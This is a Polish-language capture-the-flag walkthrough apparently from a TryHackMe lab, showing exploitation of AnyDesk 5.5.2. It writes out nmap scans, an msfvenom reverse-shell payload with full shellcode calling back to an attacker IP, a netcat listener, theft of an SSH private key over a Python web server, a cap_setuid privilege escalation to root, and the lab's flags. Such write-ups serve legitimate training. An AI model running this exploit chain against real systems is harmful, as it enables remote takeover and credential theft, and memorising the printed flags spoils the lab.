Project 15 - Wykorzystanie exploita dla AnyDesk 5.5.2


*Rekonesans*
*Skanowanie za pomocą Nmap*
```bash
sudo nmap -sV -sC -O 10.10.27.11
```

```bash
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-21 03:40 EDT
Nmap scan report for 10.10.27.11
Host is up (0.048s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 72:d7:25:34:e8:07:b7:d9:6f:ba:d6:98:1a:a3:17:db (RSA)
|   256 72:10:26:ce:5c:53:08:4b:61:83:f8:7a:d1:9e:9b:86 (ECDSA)
|_  256 d1:0e:6d:a8:4e:8e:20:ce:1f:00:32:c1:44:8d:fe:4e (ED25519)
7070/tcp open  ssl/realserver?
| ssl-cert: Subject: commonName=AnyDesk Client
| Not valid before: 2022-03-23T20:04:30
|_Not valid after:  2072-03-10T20:04:30
|_ssl-date: TLS randomness does not represent time
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=10/21%OT=22%CT=1%CU=35659%PV=Y%DS=2%DC=I%G=Y%TM=63524D
OS:2A%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=110%TI=Z%CI=Z%II=I%TS=A)OP
OS:S(O1=M506ST11NW7%O2=M506ST11NW7%O3=M506NNT11NW7%O4=M506ST11NW7%O5=M506ST
OS:11NW7%O6=M506ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)EC
OS:N(R=Y%DF=Y%T=40%W=F507%O=M506NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C
OS:D=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

*Otwarte porty*
```bash
22/tcp   open  ssh             OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
7070/tcp open  ssl/realserver?
ssl-cert: Subject: commonName=AnyDesk Client
```

```bash
sudo nmap — script=vuln 10.10.27.11
```

```bash
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-21 03:41 EDT
Failed to resolve "—".
Failed to resolve "script=vuln".
Nmap scan report for 10.10.27.11
Host is up (0.066s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
7070/tcp open  realserver
```

```bash
nmap -p- 10.10.27.11
```

```bash
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-21 03:46 EDT
Nmap scan report for 10.10.27.11
Host is up (0.057s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT      STATE SERVICE
22/tcp    open  ssh
7070/tcp  open  realserver
39231/tcp open  unknown
```

```bash
nmap --script safe -sV -p 22,7070 10.10.27.11
```

```bash
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-21 04:11 EDT
Pre-scan script results:
|_hostmap-robtex: *TEMPORARILY DISABLED* due to changes in Robtex's API. See https://www.robtex.com/api/
| broadcast-wsdd-discover: 
|   Devices
|     239.255.255.250
|         Message id: 5f52bfdb-e5cc-4b88-a94e-09df11e9b46d
|         Address: http://192.168.1.119:5357/42f73b5e-fb82-491d-9684-b579fa437461/
|_        Type: Device pub:Computer
| broadcast-upnp-info: 
|   239.255.255.250
|       Server: Linux/3.10.53-HULK2, UPnP/1.0, Portable SDK for UPnP devices/1.6.18
|_      Location: http://192.168.1.20:49652/49652gatedesc.xml
| broadcast-netbios-master-browser: 
|_ip  server  domain
|_http-robtex-shared-ns: *TEMPORARILY DISABLED* due to changes in Robtex's API. See https://www.robtex.com/api/
| targets-asn: 
|_  targets-asn.asn is a mandatory parameter
Nmap scan report for 10.10.27.11
Host is up (0.23s latency).

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh2-enum-algos: 
|   kex_algorithms: (10)
|   server_host_key_algorithms: (5)
|   encryption_algorithms: (6)
|   mac_algorithms: (10)
|_  compression_algorithms: (2)
|_banner: SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.6
| vulners: 
|   cpe:/a:openbsd:openssh:7.6p1: 
|       EXPLOITPACK:98FE96309F9524B8C84C508837551A19    5.8     https://vulners.com/exploitpack/EXPLOITPACK:98FE96309F9524B8C84C508837551A19    *EXPLOIT*
|       EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97    5.8     https://vulners.com/exploitpack/EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97    *EXPLOIT*
|       EDB-ID:46516    5.8     https://vulners.com/exploitdb/EDB-ID:46516      *EXPLOIT*
|       EDB-ID:46193    5.8     https://vulners.com/exploitdb/EDB-ID:46193      *EXPLOIT*
|       CVE-2019-6111   5.8     https://vulners.com/cve/CVE-2019-6111
|       1337DAY-ID-32328        5.8     https://vulners.com/zdt/1337DAY-ID-32328        *EXPLOIT*
|       1337DAY-ID-32009        5.8     https://vulners.com/zdt/1337DAY-ID-32009        *EXPLOIT*
|       SSH_ENUM        5.0     https://vulners.com/canvas/SSH_ENUM     *EXPLOIT*
|       PACKETSTORM:150621      5.0     https://vulners.com/packetstorm/PACKETSTORM:150621      *EXPLOIT*
|       EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0    5.0     https://vulners.com/exploitpack/EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0    *EXPLOIT*
|       EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283    5.0     https://vulners.com/exploitpack/EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283    *EXPLOIT*
|       EDB-ID:45939    5.0     https://vulners.com/exploitdb/EDB-ID:45939      *EXPLOIT*
|       EDB-ID:45233    5.0     https://vulners.com/exploitdb/EDB-ID:45233      *EXPLOIT*
|       CVE-2018-15919  5.0     https://vulners.com/cve/CVE-2018-15919
|       CVE-2018-15473  5.0     https://vulners.com/cve/CVE-2018-15473
|       1337DAY-ID-31730        5.0     https://vulners.com/zdt/1337DAY-ID-31730        *EXPLOIT*
|       CVE-2021-41617  4.4     https://vulners.com/cve/CVE-2021-41617
|       CVE-2020-14145  4.3     https://vulners.com/cve/CVE-2020-14145
|       CVE-2019-6110   4.0     https://vulners.com/cve/CVE-2019-6110
|       CVE-2019-6109   4.0     https://vulners.com/cve/CVE-2019-6109
|       CVE-2018-20685  2.6     https://vulners.com/cve/CVE-2018-20685
|       PACKETSTORM:151227      0.0     https://vulners.com/packetstorm/PACKETSTORM:151227      *EXPLOIT*
|       MSF:AUXILIARY-SCANNER-SSH-SSH_ENUMUSERS-        0.0     https://vulners.com/metasploit/MSF:AUXILIARY-SCANNER-SSH-SSH_ENUMUSERS- *EXPLOIT*
|_      1337DAY-ID-30937        0.0     https://vulners.com/zdt/1337DAY-ID-30937        *EXPLOIT*
| ssh-hostkey: 
|   2048 72:d7:25:34:e8:07:b7:d9:6f:ba:d6:98:1a:a3:17:db (RSA)
|   256 72:10:26:ce:5c:53:08:4b:61:83:f8:7a:d1:9e:9b:86 (ECDSA)
|_  256 d1:0e:6d:a8:4e:8e:20:ce:1f:00:32:c1:44:8d:fe:4e (ED25519)
7070/tcp open  tcpwrapped
|_unusual-port: tcpwrapped unexpected on port tcp/7070
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| port-states: 
|   tcp: 
|_    open: 22,7070
|_fcrdns: FAIL (No PTR record)
| dns-blacklist: 
|   SPAM
|     list.quorum.to - FAIL
|_    l2.apews.org - FAIL

Post-scan script results:
| reverse-index: 
|   22/tcp: 10.10.27.11
|_  7070/tcp: 10.10.27.11
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.56 seconds
zsh: segmentation fault  nmap --script safe -sV -p 22,7070 10.10.27.11
```

*Enumeracja serwera HTTP za pomoca Gobuster*
```bash
gobuster dir -u http://10.10.27.11 -w /usr/share/wordlists/dirb/common.txt -o directories.txt
```

*Szukanie exploita dla AnyDesk*
*Kali Linux*
```bash
searchsploit AnyDesk 5.5.2
searchsploit -m linux/remote/49613.py
```

*Kali Linux*
```bash
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.14.32.12 LPORT=4545 -b "\x00\x25\x26" -f python -v shellcode
```
*Skopiować*
```bash
shellcode =  b""
shellcode += b"\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48"
shellcode += b"\x8d\x05\xef\xff\xff\xff\x48\xbb\x0b\x9a\xcd"
shellcode += b"\xd8\x31\x80\x1f\x1f\x48\x31\x58\x27\x48\x2d"
shellcode += b"\xf8\xff\xff\xff\xe2\xf4\x61\xb3\x95\x41\x5b"
shellcode += b"\x82\x40\x75\x0a\xc4\xc2\xdd\x79\x17\x57\xa6"
shellcode += b"\x09\x9a\xdc\x19\x3b\x8e\x3f\x13\x5a\xd2\x44"
shellcode += b"\x3e\x5b\x90\x45\x75\x21\xc2\xc2\xdd\x5b\x83"
shellcode += b"\x41\x57\xf4\x54\xa7\xf9\x69\x8f\x1a\x6a\xfd"
shellcode += b"\xf0\xf6\x80\xa8\xc8\xa4\x30\x69\xf3\xa3\xf7"
shellcode += b"\x42\xe8\x1f\x4c\x43\x13\x2a\x8a\x66\xc8\x96"
shellcode += b"\xf9\x04\x9f\xcd\xd8\x31\x80\x1f\x1f"
```
*Kali Linux*
```bash
sudo vim AnyDesk.py

Wymienić skopiowany fragment kodu
Wpisać IP Targetu

python2 AnyDesk.py
```
*Kali Linux*
```bash
nc -nvlp 4545
```

*Konto użytkownika Annie*
```bash
id
python3 -c "import pty;pty.spawn('/bin/bash')"

cat user.txt
THM{N0t_Ju5t_ANY_D3sk}
```
*Katalog .ssh*
```bash
cd .ssh
python3 -m http.server
```
*Kali Linux*
```bash
wget http://10.10.27.11:8000/id_rsa

chmod 600 id_rsa

ssh -i id_rsa Annie@10.10.27.11
```
NIe udało sie !!!

*Inny sposób*
```bash
cd /home/annie
which python3
cp /usr/bin/python3 .
/sbin/setcap cap_setuid+ep /home/annie/python3
./python3 -c 'import os;os.setuid(0);os.system("/bin/bash")'
cat /root/root.txt
THM{0nly_th3m_5.5.2_D3sk}
```
